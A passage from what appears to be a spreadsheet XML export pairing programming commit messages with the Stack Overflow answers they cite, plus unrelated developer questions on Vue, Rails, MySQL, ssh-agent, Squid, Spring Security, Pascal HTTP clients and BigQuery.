    public byte[] Sign(byte[] message)
    {
        [your code to call the smart card function to sign the message using RSASSA-PKCS1-v1_5]
        [you might or might not have to hash the message first, I don't know that smart card API you use]
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">I have a web application that currently has about 500,000 users, averaging about 500 page views per hour, and we are expecting to have to scale up to 20,000,000 users within the next year. 
Our current system cannot handle that scale, and so we need to move to one that can. 
I was thinking a services-based architecture would be more robust and allow for the component services to be scaled independently of each other and the main application. 
But I have been warned that one can easily design a services architecture that doesn't scale well, and since I have little to no experience designing such a system, going through some recommended resources is probably better than just "taking a stab at it."
So, what resources are recommended for architecting a well-scaling system? The platform is .Net, but I would imagine that the same information applies to any service-based architecture, regardless of platform.
</t>
  </si>
  <si>
    <t>C683</t>
  </si>
  <si>
    <t>Move files and components around.
Create separate src/components and src/views directories.
Per https://stackoverflow.com/q/50865828/, the convention
(or maybe just "a convention") is to put reusable components
in src/components and routing views in src/views.
Also move routing-specific logic into src/router/index.js
and create a new Toolbar component instead of dumping the
navigation UI in the App component. Remove some duplication
in the declaration of the "Sign out" menu item, too.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a TabView&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct HomeView: View {
    var body: some View {
        TabView() {
            // 1) Tab1
            NavigationStack {
                SomeView()
                }
            }
            .tabItem {
                Image(systemName: &amp;quot;flag.and.flag.filled.crossed&amp;quot;)
            }
            .tag(Tab.sometag)
            // 2) Tab 2
            NavigationStack {
                SomeView()
            }
            .tabItem {
                Image(systemName: &amp;quot;tray&amp;quot;)
            }
            .tag(Tab.sometag)
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The icons are very close to the top border of the tab bar so I'm trying to move them down a bit.&lt;/p&gt;
&lt;p&gt;I tried using &lt;code&gt;appearance.stackedLayoutAppearance.normal.[property]&lt;/code&gt; but could not find a suitable &lt;code&gt;property&lt;/code&gt; for moving down the icons.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>First of all, both folders,
src/components
and
src/views
, contain Vue components.
The key difference is that some Vue components act as
Views
for routing.
When dealing with routing in Vue, usually with
Vue Router
, routes are defined in order to switch the current
view
used in the
&lt;router-view&gt;
component. These routes are typically located at
src/router/routes.js
, where we can see something like this:
import Home from '@/views/Home.vue'
import About from '@/views/About.vue'
export default [
  {
    path: '/',
    name: 'home',
    component: Home,
  },
  {
    path: '/about',
    name: 'about',
    component: About,
  },
]
The components located under
src/components
are less likely to be used in a route whereas components located under
src/views
will be used by at least one route.
Vue CLI aims to be the standard tooling baseline for the Vue
ecosystem. It ensures the various build tools work smoothly together
with sensible defaults so you can focus on writing your app instead of
spending days wrangling with configurations. At the same time, it
still offers the flexibility to tweak the config of each tool without
the need for ejecting.
Vue CLI aims for rapid Vue.js development, it keeps things simple and offers flexibility. Its goal is to enable teams of varying skill levels to set up a new project and get started.
At the end of the day,
it is a matter of convenience and application structure
.
Some people like to have their Views folder under
src/router
like
this
enterprise boilerplate.
Some people call it
Pages
instead of
Views
.
Some people have all their components under the same folder.
Choose the application structure that best suits the project you are working on.</t>
  </si>
  <si>
    <t>C684</t>
  </si>
  <si>
    <t>Fixed likely optimistic locking issue with audit trail
see: http://stackoverflow.com/questions/839314/clientabortexception-java-net-socketexception-connection-reset-by-peer-socket</t>
  </si>
  <si>
    <t>Your HTTP client disconnected.
This could have a couple of reasons:
Responding to the request took too long, the client gave up
You responded with something the client did not understand
The end-user actually cancelled the request
A network error occurred
... probably more
You can fairly easily emulate the behavior:
URL url = new URL("http://example.com/path/to/the/file");
int numberOfBytesToRead = 200;
byte[] buffer = new byte[numberOfBytesToRead];
int numberOfBytesRead = url.openStream().read(buffer);</t>
  </si>
  <si>
    <t xml:space="preserve">Background:
I work at a company with a large SAP investment, and we also have dozens of large .NET systems (mostly internally for engineering systems), and Java platforms (mostly for external web applications). As such, we have large development shops on ABAP, C#, and Java EE.
Question:
In short, We need a better way to determine when Commercial, Off The Shelf (COTS) software should be used, and when we should leverage our own developers.
Criteria:
I'd like to build a decision tree based on best practices to help with this question.
At the highest level, Jeff Atwood's related post sums it up well: [external-link]
A little deeper, I'd like to see criteria like:
Is a COTS system available that meets most of the requirements?
(If yes, a COTS system may be a good option: (Avoid reinventing the wheel))
If so, is there a fully exposed API
available?   (This is essential to
integration / customization)
If so, is the source code available?
(This is essential to deep
integration / customization)
Is the system designed to meet a core business function / create a competitive advantage ?
(If so, custom development may be a good option: [external-link])
If so, will custom development allow
for code reuse in future / other
systems?     (There are many advantages
to reusing existing code)
What is the TCO for the custom application vs. the COTS product?
Are there time constraints that could not be met with custom development?
(If yes, a COTS system may be a good option)
</t>
  </si>
  <si>
    <t>C685</t>
  </si>
  <si>
    <t>Fix spec to check for nil versions in audit trail
Seems that touch events create nil versions - added config as per:
https://stackoverflow.com/questions/54788701/paper-trail-gem-saving-versions-with-object-changes-nil
So that touch events are ignored by default. Which I think was the case
in earlier versions given that the CSS selectors on in the
audit_trail_spec where ordinal values off in the specs because the app
was recording touch events as well as things we are interested in.</t>
  </si>
  <si>
    <t>The nil object changes is due to touch events on attributes that were skipped. The only solution I came up with for that is to only track versions on create, update and destroy.
I also discovered that we had duplicate version records. We turned on PaperTrail for all models by putting the below in
ApplicationRecord
, this caused duplicate versions to be created if a class inherited from another one. ie If you have
class Foo &lt; Bar
and do
Bar.create
that would create 2 identical version records.
Initial Version in
ApplicationRecord
def self.inherited(subclass)
  super
  subclass.send(:has_paper_trail)
end
Final Version
def self.inherited(subclass)
  classes_to_skip = %w[Foo]
  attributes_to_skip = [:bar_at]
  on_actions = [:create, :update, :destroy]
  super
  unless classes_to_skip.include?(subclass.name)
    subclass.send(:has_paper_trail, on: on_actions, ignore: attributes_to_skip)
  end
end</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a set of two-dimensional points, &lt;code&gt;X&lt;/code&gt; with dimension of &lt;code&gt;n by 2&lt;/code&gt;, and nearest neighbor distance of &lt;code&gt;Dx (n by 1) &lt;/code&gt; where &lt;code&gt;DX(i)&lt;/code&gt; being the distance of &lt;code&gt;X(i)&lt;/code&gt; to its nearest neighbor. I want to generate nontrivial Y with the constraint that &lt;code&gt;Dy=Dx&lt;/code&gt;. With nontrivial I mean &lt;code&gt;Y&lt;/code&gt; can't be translation, rotation of reflection of &lt;code&gt;X&lt;/code&gt; or any combination of these operations.&lt;/p&gt;
&lt;p&gt;I tried to generate &lt;code&gt;Y&lt;/code&gt; points iteratively with some random initial point and adding the subsequent points with the specified distance such that the new point doesn't change the previous points nearest neighbor. But then I'd need to sort distances and start with the highest distance and proceed to the lowest distance because otherwise if the next distance is higher, the nearest neighbor of the last point would be the previous point not the newly added point. With sorting the distances, I can get the desired points, but I prefer if they are more randomized. With distances sorted, all initial points are far from each other and all last points are close to each other.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C686</t>
  </si>
  <si>
    <t>Fixed the authentication error.
 "npm un mysql"
 "npm i mysql2"
https://stackoverflow.com/a/56509065</t>
  </si>
  <si>
    <t>Execute the following query in MYSQL Workbench
ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
Where
root
as your user
localhost
as your URL
and
password
as your password
Then run this query to refresh privileges:
flush privileges;
Try connecting using node after you do so.
If that doesn't work, try it without
@'localhost'
part.</t>
  </si>
  <si>
    <t xml:space="preserve">In a Windows Server 2003 environment with a self hosted .Net 3.5/WCF application, how can an application report its status to a BigIP Local Traffic Manager?
Example: One of my services errors.  My custom WCF application hosting software (written because Windows Server 2008 is not yet available and I'm using WCF TCP bindings) detects this and wants to report itself as down until it can recover the errant service.  It needs to report itself as down to the BigIP LTM so that it is no longer sent client originated requests.
</t>
  </si>
  <si>
    <t>C687</t>
  </si>
  <si>
    <t>Add API module dependencies to Javadoc classpath
As per http://stackoverflow.com/a/34572606/1676363</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When try to POST the api it routes me to /error
here is debug logs
2025-02-20T09:34:07.325+05:30 DEBUG 18944 --- [artistapp] [nio-8081-exec-2] o.s.security.web.FilterChainProxy        : Securing POST /error
2025-02-20T09:34:07.336+05:30 DEBUG 18944 --- [artistapp] [nio-8081-exec-2] o.s.s.w.a.AnonymousAuthenticationFilter  : Set SecurityContextHolder to anonymous SecurityContext
2025-02-20T09:34:07.342+05:30 DEBUG 18944 --- [artistapp] [nio-8081-exec-2] o.s.s.w.a.Http403ForbiddenEntryPoint     : Pre-authenticated entry point called. Rejecting access&lt;/p&gt;
&lt;p&gt;Here is my controller&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package com.ht_digital.artistapp.controller;
import org.springframework.security.access.prepost.PreAuthorize;
import org.springframework.web.bind.annotation.*;
import com.ht_digital.artistapp.model.User;
import com.ht_digital.artistapp.service.UserService;
import org.springframework.http.HttpStatus;
import com.ht_digital.artistapp.config.JwtUtil;
import com.ht_digital.artistapp.model.User;
import com.ht_digital.artistapp.service.UserService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.ResponseEntity;
import org.springframework.security.core.Authentication;
import org.springframework.security.core.userdetails.UserDetails;
import org.springframework.security.authentication.AuthenticationManager;
import org.springframework.security.authentication.UsernamePasswordAuthenticationToken;
@RestController
@RequestMapping(&amp;quot;/api/auth&amp;quot;)
@CrossOrigin(origins = &amp;quot;http://localhost:3000&amp;quot;)
public class AuthController {
@Autowired
private UserService userService;
@Autowired
private JwtUtil jwtUtil;
private final AuthenticationManager authenticationManager;
public AuthController(AuthenticationManager authenticationManager) {
    this.authenticationManager = authenticationManager;
}
@PostMapping(&amp;quot;/signup&amp;quot;)
public ResponseEntity&amp;lt;?&amp;gt; signup(@RequestBody User user) {
    try {
        User newUser = userService.registerUser(user);
        if (newUser == null) {
            return ResponseEntity.ok(&amp;quot;Email already exists. Please login.&amp;quot;);
        }
        return ResponseEntity.ok(&amp;quot;User registered successfully.&amp;quot;);
    } catch (Exception e) {
        return ResponseEntity.badRequest().body(&amp;quot;An error occurred: &amp;quot; + e.getMessage());
    }
}
@PostMapping(&amp;quot;/login&amp;quot;)
public ResponseEntity&amp;lt;?&amp;gt; login(@RequestBody User user) {
    Authentication authentication = authenticationManager.authenticate(
            new UsernamePasswordAuthenticationToken(user.getEmail(), user.getPassword()));
    UserDetails userDetails = (UserDetails) authentication.getPrincipal();
    String token = jwtUtil.generateToken(userDetails.getUsername());
    return ResponseEntity.ok(token);
}
  }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is Security config for the code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package com.ht_digital.artistapp.config;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import 
org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.security.web.SecurityFilterChain;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.http.SessionCreationPolicy;
import org.springframework.security.authentication.AuthenticationManager;
import 
org.springframework.security.web.authentication.UsernamePasswordAuthenticationFilter;
import static org.springframework.security.config.Customizer.withDefaults;
@Configuration
@EnableWebSecurity
public class SecurityConfig {
private final JwtAuthenticationFilter jwtAuthenticationFilter;
public SecurityConfig(JwtAuthenticationFilter jwtAuthenticationFilter) {
    this.jwtAuthenticationFilter = jwtAuthenticationFilter;
}
@Bean
public PasswordEncoder passwordEncoder() {
    return new BCryptPasswordEncoder();
}
@Bean
public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception {
    http
            .csrf(csrf -&amp;gt; csrf.disable())
            .cors(withDefaults())
            .sessionManagement(session -&amp;gt; session.sessionCreationPolicy(SessionCreationPolicy.STATELESS))
            .authorizeHttpRequests(auth -&amp;gt; auth
                    .requestMatchers(&amp;quot;/api/auth/signup&amp;quot;, &amp;quot;/api/auth/login&amp;quot;).permitAll()
                    .anyRequest().authenticated()
            ).addFilterBefore(jwtAuthenticationFilter, UsernamePasswordAuthenticationFilter.class);
    return http.build();
}
@Bean
public AuthenticationManager authenticationManager(AuthenticationConfiguration authenticationConfiguration) throws Exception {
    return authenticationConfiguration.getAuthenticationManager();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C688</t>
  </si>
  <si>
    <t>Try to resolve 'Could not open a connection to your authentication ag
ent.'
following https://stackoverflow.com/a/17848593/1802726</t>
  </si>
  <si>
    <t>Did You Start ssh-agent?
You might need to start ssh-agent before you run the ssh-add command:
eval `ssh-agent -s`
ssh-add
Note that this will start the agent for msysgit Bash on Windows. If you're using a different shell or operating system, you might need to use a variant of the command, such as those listed in the other answers.
See the following answers:
ssh-add complains: Could not open a connection to your authentication agent
Git push requires username and password (contains detailed instructions on how to use ssh-agent)
How to run (git/ssh) authentication agent?.
https://stackoverflow.com/questions/17846529/could-not-open-a-connection-to-your-authentication-agent/17695338#17695338
To automatically start ssh-agent and allow a single instance to work in multiple console windows, see Start ssh-agent on login.
Why do we need to use eval instead of just ssh-agent?
SSH needs two things in order to use ssh-agent: an ssh-agent instance running in the background, and an environment variable set that tells SSH which socket it should use to connect to the agent (SSH_AUTH_SOCK IIRC). If you just run ssh-agent then the agent will start, but SSH will have no idea where to find it.
from this comment.
Public vs Private Keys
Also, whenever I use ssh-add, I always add private keys to it. The file ~/.ssh/id_rsa.pub looks like a public key, I'm not sure if that will work.  Do you have a ~/.ssh/id_rsa file? If you open it in a text editor, does it say it's a private key?</t>
  </si>
  <si>
    <t xml:space="preserve">When you're making a page that is visually broken down into specific regions, do you break those regions down into controls, or do you put everything on the page and in one code-behind? 
If regions are separated into controls, how do you facilitate communication among the controls? By communication I mean simply exchanging data on the server side. 
Think of a page with a couple boxes above a rather complicated GridView. One box dictates what the GridView displays, the other box allows you to do various things with the GridView. Both boxes need to communicate with the grid, but not with each other. 
The code-behind for this would be at least a couple thousand lines. 
Any resources on making these types of design decisions would be helpful. 
Thanks
</t>
  </si>
  <si>
    <t>C689</t>
  </si>
  <si>
    <t>Rewrite authentication
As per: https://stackoverflow.com/questions/60780326/typo3-custom-fe-login-without-form</t>
  </si>
  <si>
    <t>You should implement an authentication service this Service only needs to imlement the "authUser()" function. So every thing else might be handled by the core authentication.
See here for details
https://docs.typo3.org/m/typo3/reference-services/8.7/en-us/Authentication/Index.html</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;â€œTypeError: NetworkError when attempting to fetch resource.â€&lt;/p&gt;
&lt;p&gt;I just completed config nginx for domain gateway wso2am But I tested the request on its demo, it reported an error as shown in the picture&lt;/p&gt;
&lt;p&gt;â€œTypeError: NetworkError when attempting to fetch resource.â€&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/trLoWCWy.png" rel="nofollow noreferrer"&gt;enter image description here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;And my config file nginx&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;upstream domain.com.vn {
     least_conn;
     server 10.0.x.x:8280 max_fails=3 fail_timeout=30s;
    server 10.0.x.x:8280 max_fails=3 fail_timeout=30s;
 }
server {
    listen     80;
    server_name domain.com.vn;
    return 301 https://$host$request_uri;
    location = /basic_status {
                stub_status;
                allow 127.0.0.1;
                allow ::1;
                allow 10.2.15.87;
                deny all;
        }
    }
server {
    listen 443 ssl;
    server_name domain.com.vn;
    ssl_certificate /etc/nginx/ssl/2023/ ....crt;
    ssl_certificate_key /etc/nginx/ssl/2023/....key;
    access_log /var/log/nginx/domain.com.vn_access.log;
    error_log /var/log/nginx/domain.com.vn_error.log debug;
    location / {
        proxy_pass http://domain.com.vn;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_connect_timeout 60;
        proxy_send_timeout 60;
        proxy_read_timeout 60;
        proxy_set_header Authorization $http_authorization;
        proxy_buffering off;
        proxy_redirect off;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Please help me with the problem, I thank you very much&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C69</t>
  </si>
  <si>
    <t>Fix- Creating a VideoLibraryViewModel instance with ViewModelPro
vider causes an exception
Exception: "java.lang.RuntimeException: Cannot create an instance of class com.example.mediaplayerapp.ui.video_library.VideoLibraryViewModel"
Solution: Change VideoLibraryViewModel to extends AndroidViewModel instead of ViewModel and create a new constructor
Reference: https://stackoverflow.com/questions/48605672/cannot-create-an-instance-of-viewmodel-class-unable-to-start-activity-component</t>
  </si>
  <si>
    <t>Quoting the documentation for AndroidViewModel:
Subclasses must have a constructor which accepts Application as the only parameter.
Your constructor does not meet that requirement.
Either:
Remove the Context context and LifecycleOwner lifecycleOwner constructor parameters from your HomeViewModel, or
Create a ViewModelProvider.Factory that can build your HomeViewModel instances, and use that factory with ViewModelProviders.of()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to make a HTTP post with TLS 1.2. I managed to make this work with &lt;a href="https://www.clevercomponents.com/products/inetsuite/" rel="nofollow noreferrer"&gt;Clever Internet Suite&lt;/a&gt; but failed with &lt;a href="https://github.com/geby/synapse" rel="nofollow noreferrer"&gt;Synapse (downloaded 2025-02)&lt;/a&gt;.
I have to make a POST request in order to get a bearer (in JSON format)
that I have to add in header in any following request (POST or GET).&lt;/p&gt;
&lt;h2&gt;This is used in both projects:&lt;/h2&gt;
&lt;pre class="lang-pascal prettyprint-override"&gt;&lt;code&gt;const 
c_username = 'AUSERNAME'; 
c_password = 'APASSWORD'; 
c_client_id= 'ACLIENTID'; 
c_url      = 'https://www.server.com/vendd/token';
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Succeeded test with Clever Internet Suite&lt;/h2&gt;
&lt;pre class="lang-pascal prettyprint-override"&gt;&lt;code&gt;procedure TForm2.ButtonA2Click(Sender: TObject);
var  AHTTP:TclHttp;
     AReq:TclHttpRequest;     AItem:TclHttpRequestItem;
     s:string;   aurl,FErrorDescr:string;
     ResObj,HelpObj: TJsonObject;  FTokenLimit:TDateTime;
begin
  try
    try
      AHTTP:=TclHttp.Create(nil);     Areq:= TclHttpRequest.create(nil);
      with AHTTP do begin
        HttpVersion:=hvHttp1_1;
        TLSFlags:=[tfUseTLS12];
        UseTLS:=ctAutomatic;
      end;
      with Areq do begin
        AITem:=AReq.Items.Add(TclFormFieldRequestItem);
          with TclFormFieldRequestItem(AITem) do begin
            FieldName:='grant_type'; FieldValue:='password';
          end;
        AITem:=AReq.Items.Add(TclFormFieldRequestItem);
          with TclFormFieldRequestItem(AITem) do begin
            FieldName:='username'; FieldValue:=c_username;
          end;
        AITem:=AReq.Items.Add(TclFormFieldRequestItem);
          with TclFormFieldRequestItem(AITem) do begin
            FieldName:='password'; FieldValue:=c_password;
          end;
        AITem:=AReq.Items.Add(TclFormFieldRequestItem);
          with TclFormFieldRequestItem(AITem) do begin
            FieldName:='client_id'; FieldValue:=c_client_id;
          end;
      end;
      aurl:=c_url;
      s:=AHTTP.Post(aurl,Areq);
      Memo1.Lines.add(s);
      ResObj:=TJsonObject.Parse(s) as TJsonObject;
      if AHTTP.StatusCode = 200 then begin    
      end else begin
      end;
    except
      on E:Exception do begin
        ShowMessage(E.Message);
      end;
    end;
  finally
    AHTTP.Free;  AReq.Free;
  end;
end;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Failed test with Ararat Synapse&lt;/h2&gt;
&lt;pre class="lang-pascal prettyprint-override"&gt;&lt;code&gt;{ *** Notes *** 
the following DLLs (32bit, as my appl) are in application's folder: 
  libssl-1_1.dll      : v.1.1.1.23 1.1.1w    date 11.9.2023 
  libcrypto-1_1.dll   : v.1.1.1.23 1.1.1w    date 11.9.2023 
  libssl-3.dll        : v.3.4.1.0   date 11.2.2025 
  libcrypto-3.dll     : v.3.4.1.0   date 11.2.2025
What happens: MyHttpPostURL returns true (no error happened) but access is denied
&amp;gt; Access Denied
&amp;gt; You don't have permission to access &amp;quot;http://www-server.com/vendd/token&amp;quot; on this server.&amp;lt;P&amp;gt; 
&amp;gt;&amp;gt; Reference #18.777ecdd4.1739735221.243974bb
&amp;gt;&amp;gt; https://errors.edgesuite.net/18.777ecdd4.1739735221.243974bb
}
uses 
Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants, System.Classes, 
Vcl.Controls, Vcl.Forms, Vcl.Dialogs,System.strutils,Vcl.StdCtrls,Vcl.Graphics,
HttpSend,blcksock, synautil, synaip, synacode, synsock,
ssl_openssl11, ssl_openssl11_lib 
//or (alternatively)  ssl_openssl3_lib, ssl_openssl3 
function MyHttpPostURL(const URL, URLData: string; const Data: TStream): Boolean;
{ MyHttpPostURL is exact copy of Synapse library's HttpPostUrl with the addition
  of lines:
  HTTP.protocol:='1.1';
  HTTP.Sock.SSL.SSLType:=LT_TLSv1_2;
  HTTP.UserAgent:='Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0';
  So the WriteStrToStream procedure is Synapse original code
}
var
  HTTP: THTTPSend;
begin
  HTTP := THTTPSend.Create;
  HTTP.protocol:='1.1';
  HTTP.Sock.SSL.SSLType:=LT_TLSv1_2;
  HTTP.UserAgent:='Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0';
  try
    WriteStrToStream(HTTP.Document, URLData);
    HTTP.MimeType := 'application/x-www-form-urlencoded';
    Result := HTTP.HTTPMethod('POST', URL);
    if Result then
      Data.CopyFrom(HTTP.Document, 0);
  finally
    HTTP.Free;
  end;
end;
procedure TForm2.SB_Auth2Click(Sender: TObject);
var MS:TMemoryStream;    URL,params:string;    AList:TStrings;
begin
  try
    MS:=TMemoryStream.create;     AList:=TStringList.Create;
    url:= c_url;
    params:='grant_type='+EncodeURLElement('password')+'&amp;amp;'
            +'username='+EncodeURLElement(c_username)+'&amp;amp;'
            +'password='+EncodeURLElement(c_password)+'&amp;amp;'
            +'client_id='+EncodeURLElement(c_client_id);
    try
      if MyHttpPostURL(URL, Params, MS) then begin
        Memo1.Lines.add('Boolean:true');
      end else begin
        Memo1.Lines.add('Boolean:false');
      end;
      MS.Position:=0;
      AList.LoadFromStream(MS);
      memo1.Lines.add(AList.text);
    except
      on E:Exception do begin
        ShowMessage(E.Message);
      end;
    end;
  finally
    MS.Free;   AList.Free;
  end;
end;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C690</t>
  </si>
  <si>
    <t>Add Basic Authentication
Reference: https://stackoverflow.com/questions/3297196</t>
  </si>
  <si>
    <t>Here's what I had to do to setup basic auth on
Ubuntu 14.04
(didn't find a guide anywhere else)
Basic squid conf
/etc/squid3/squid.conf
instead of the super bloated default config file
auth_param basic program /usr/lib/squid3/basic_ncsa_auth /etc/squid3/passwords
auth_param basic realm proxy
acl authenticated proxy_auth REQUIRED
http_access allow authenticated
# Choose the port you want. Below we set it to default 3128.
http_port 3128
Please note the
basic_ncsa_auth
program instead of the old
ncsa_auth
squid 2.x
For squid 2.x you need to edit
/etc/squid/squid.conf
file and place:
auth_param basic program /usr/lib/squid/digest_pw_auth /etc/squid/passwords
auth_param basic realm proxy
acl authenticated proxy_auth REQUIRED
http_access allow authenticated
Setting up a user
sudo htpasswd -c /etc/squid3/passwords username_you_like
and enter a password twice for the chosen username then
sudo service squid3 restart
squid 2.x
sudo htpasswd -c /etc/squid/passwords username_you_like
and enter a password twice for the chosen username then
sudo service squid restart
htdigest vs htpasswd
For the many people that asked me: the 2 tools produce different file formats:
htdigest
stores the password in plain text.
htpasswd
stores the password hashed (various hashing algos are available)
Despite this difference in format
basic_ncsa_auth
will still be able to parse a password file generated with
htdigest
. Hence you can alternatively use:
sudo htdigest -c /etc/squid3/passwords realm_you_like username_you_like
Beware that this approach is
empirical, undocumented and may not be supported
by future versions of Squid.
On Ubuntu 14.04
htdigest
and
htpasswd
are both available in the
[apache2-utils][1]
package.
MacOS
Similar as above applies, but file paths are different.
Install squid
brew install squid
Start squid service
brew services start squid
Squid config file is stored at
/usr/local/etc/squid.conf
.
Comment or remove following line:
http_access allow localnet
Then similar to linux config (but with updated paths) add this:
auth_param basic program /usr/local/Cellar/squid/4.8/libexec/basic_ncsa_auth /usr/local/etc/squid_passwords
auth_param basic realm proxy
acl authenticated proxy_auth REQUIRED
http_access allow authenticated
Note that path to
basic_ncsa_auth
may be different since it depends on installed version when using
brew
, you can verify this with
ls /usr/local/Cellar/squid/
. Also note that you should add the above just bellow the following section:
#
# INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS
#
Now generate yourself a user:password basic auth credential (note:
htpasswd
and
htdigest
are also both available on MacOS)
htpasswd -c /usr/local/etc/squid_passwords username_you_like
Restart the squid service
brew services restart squid</t>
  </si>
  <si>
    <t xml:space="preserve">The idea that web services are small bits of functionality or data that are bundled together and encapsulated as small, stand-alone entities is pretty clear, and makes good sense. But how do services relate to databases that they use or provide an interface for?
For example, when moving from a monolithic, 2-tier architecture with a massive database that handled everything to a services-based architecture, how is the database affected? Is the database chunked into smaller databases and each one interfaced with via a service, or does each service simply interact with the original massive database?
Also, if the database get's split up into, say, a service for user authentication and one for product information, where would the many-to-many entity that tracked product views per user in the original massive database end up?
</t>
  </si>
  <si>
    <t>C691</t>
  </si>
  <si>
    <t>fix omniauth signup
see https://stackoverflow.com/questions/42990547/devise-google-oauth-2-not-found-authentication-passthru</t>
  </si>
  <si>
    <t>I solved the problem adding the following to
config/initializers/omniauth.rb
:
OmniAuth.config.allowed_request_methods = %i[get]
Explanation:
the above is the configuration shown in
https://github.com/zquestz/omniauth-google-oauth2#usage
:
Rails.application.config.middleware.use OmniAuth::Builder do
  provider :google_oauth2, ENV['GOOGLE_CLIENT_ID'], ENV['GOOGLE_CLIENT_SECRET']
end
OmniAuth.config.allowed_request_methods = %i[get]
but without
Rails.application.config.middleware.use OmniAuth::Builder do
  provider :google_oauth2, ENV['GOOGLE_CLIENT_ID'], ENV['GOOGLE_CLIENT_SECRET']
end
since that is already provided in your
config/initializers/devise.rb
:
config.omniauth :google_oauth2, ENV["GOOGLE_CLIENT_ID"], ENV["GOOGLE_CLIENT_SECRET"], {
      name: 'my-project',
      scope: 'email',
      prompt: 'select_account',
      image_aspect_ratio: 'original',
      image_size: 100,
      ssl_verify: false
  }</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on the Google Data Analytics Certificate and trying to clean a dataset consisting of 3 columns in BigQuery:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;An Id number&lt;/li&gt;
&lt;li&gt;A date in MM/DD/YYYY HH:MM:SS AM/PM format&lt;/li&gt;
&lt;li&gt;Number of calories&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Columns 1 and 3 I was able to upload as integers but Iâ€™ve had many issues with the second column. I ended up just uploading column 2 as a string. &lt;em&gt;&lt;strong&gt;Ideally, I want to replace it with the proper format (YYYY-MM-DD HH:MM:SS) and as a timestamp.&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;So from this:&lt;/p&gt;
&lt;p&gt;4/25/2016 09:37:35 AM as a string&lt;/p&gt;
&lt;p&gt;to this:&lt;/p&gt;
&lt;p&gt;2016-04-25 09:37:35 UTC as a timestamp&lt;/p&gt;
&lt;p&gt;I have been trying to fix this for a while now and am very new. Any feedback or recommendations at all are greatly appreciated. Thank you!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;TLDR; Have string column (all dates) in BigQuery in MM/DD/YYYY HH:MM:SS AM/PM format and want it in YYYY-MM-DD HH:MM:SS format as a timestamp.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I tried a lot of different ways to fix this issue so far:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I tried fixing the format in Excel like I did with other files but it was too big to import.&lt;/p&gt;
&lt;p&gt;I tried casting it as a timestamp and I got an error that it was improperly formatted. I tried fixing the format and I got an error that it was the wrong datatype.&lt;/p&gt;
&lt;p&gt;I tried parsing it as a timestamp in the correct format which worked. I saved it to a destination table and I then cast this into a timestamp and that worked as well. To add it to the main data table, I tried appending it to the file where I would then drop the other poorly formatted column but when I did this it gave me an error: Invalid schema update. Cannot add fields (field: f0_). I then rewrote the original query using a subquery to pull the Id and the fixed column together. I planned to join it to the original datatable on Id but when I ran the query it gave me the error: scalar subquery produces more than one element. I tried overwriting the datatable too and that obviously didnâ€™t work.&lt;/p&gt;
&lt;p&gt;The code I used to parse the column:&lt;/p&gt;
&lt;p&gt;SELECT&lt;br /&gt;
parse_datetime('%m/%d/%Y %r', Time) AS Time1&lt;br /&gt;
FROM&lt;br /&gt;
&lt;code&gt;dataproject.bellabeat_fitness_data.412_512_heart&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The subquery I used:&lt;/p&gt;
&lt;p&gt;SELECT
Id,
(SELECT&lt;br /&gt;
parse_datetime('%m/%d/%Y %r', Time) AS Time1&lt;br /&gt;
FROM&lt;br /&gt;
&lt;code&gt;dataproject.bellabeat_fitness_data.412_512_heart&lt;/code&gt;)
FROM
dataproject.bellabeat_fitness_data.412_512_heart&lt;/p&gt;
&lt;p&gt;I tried UPDATE but before I could tweak anything I got an error that I needed to upgrade from the free tier to the upgraded free trial to use DML queries. This is the last thing I can think of to fix this issue but I donâ€™t want to give payment information if I donâ€™t have to.&lt;/p&gt;
&lt;p&gt;The UPDATE code I tried using (not 100% sure if it would work since it wouldn't let me try to run it):&lt;/p&gt;
&lt;p&gt;UPDATE
